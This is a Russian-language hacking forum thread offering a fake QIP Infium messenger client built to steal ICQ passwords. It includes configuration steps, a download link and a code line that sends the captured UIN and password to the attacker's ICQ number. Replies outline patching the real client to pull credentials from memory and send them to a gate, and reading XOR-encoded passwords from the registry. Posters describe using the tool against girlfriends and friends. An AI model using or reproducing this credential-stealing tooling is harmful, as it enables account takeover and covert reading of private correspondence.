Фейк QIP'a_Infium для взлома Выкладываю фейк QIP_Infium. Все нестандартные компоненты в архиве. Редактируйте на свой вкус. (Сделан как и Фейк Mail@Агент ). Минус только в том, что я не нашел нормальной иконки QIP'a Infium, так что если у кого найдется, пусть выложит иконку сюда и не смог сделать что-бы место для ввода паролей выводило кружочки, получились только '*'. В общем юзайте Help в архиве В компоненте icqclient (Object Inspector) укажите другой номер и пароль, записав в UIN и Password - это номер с которого будет слаться отчёт. А в строке icqclient1.SendMessage(368368456, 'ICQ: ' + ComboBox1.Text + ' Password: ' + Edit2.Text); 368368456 - это на какой номер оташлется отчет. Ссылка для скачивания
А вообще если нормально делать, то лучше (НА примере обычной Qip) 1) Снимаешь проверку Crc 2) через декомпилятор смотришь адрес обработчика нажатия на кнопку Подключиться и пербиваешь свой обработчик. 3) приделываешь к Qip небольшой код который выдерит логин и пас из оперативы и отошлет на гейт. и обратно возвращаешься на код обработчика Больше ничего не нужно и всё будет пахать на ура. Да и максимум на создание такого твариния потратится пол дня (если конечно ассемблер знаешь (\\\ехидно улыбнулся\\))
Имхо, сама идея с фейками (мейл-агент, квип и т.д.) нереентабельна. Человек, дорожащий своей информацией или владеющий красивым 5-6 знаком, будет скачивать квип только с офф. сайта. /а мейл-агенту вообще место в биореакторе/
Программа предназначина для взлома мыла/аси девушки или просто над другом поприкалываться. Да, ты прав, тут ты 5* не выловишь
Пизд*жь и провокация ... у примеру у меня зарадминено 40 компов... и что бы узнать чей то пасс от агента etc... это самый лучший способ.... Да бля.... элементарно впарить девушке в самый раз.. как 2 пальца....
slider Имхо Наверно это круто... для кого как, мне проще считать поксоренный пасс агента из реестра, чем тащить несколько метров софта на компьютер пользователя и палиться перед проактивками при подмене файла. Это уже совсем абсурдно, зачем у бедной девушке воровать пароль? Если только использовать фейк для чтения переписки...
Нет ..это имхо.... очень... И поксоренный пасс квипа тож? Проактивки молчат.... никакого палева... Какие несколько метров??? кб 200 от силы.... Сам ответил на свой вопрос...
Этот исходник не смотрел, и как то влом смотреть после фразы про то что этот "фейк" сделан так же как и Фейк Mail@Агент, т.к. в предыдущем проекте ты бы хотя бы удосужился дописать его, т.к. в том проекте я не нашел не единой строчки запускающей реальный MainAgent, малотчик ничего не скажу, норм постарался, сделал форму один в один с оригиналом но неплохо было бы если бы ты еще программно заполнял поля в рельном майл агенте, предварительно его запустив и переместив его окно за пределы видимости, чтоб уж палева никакого не было, а так.... мля доделывай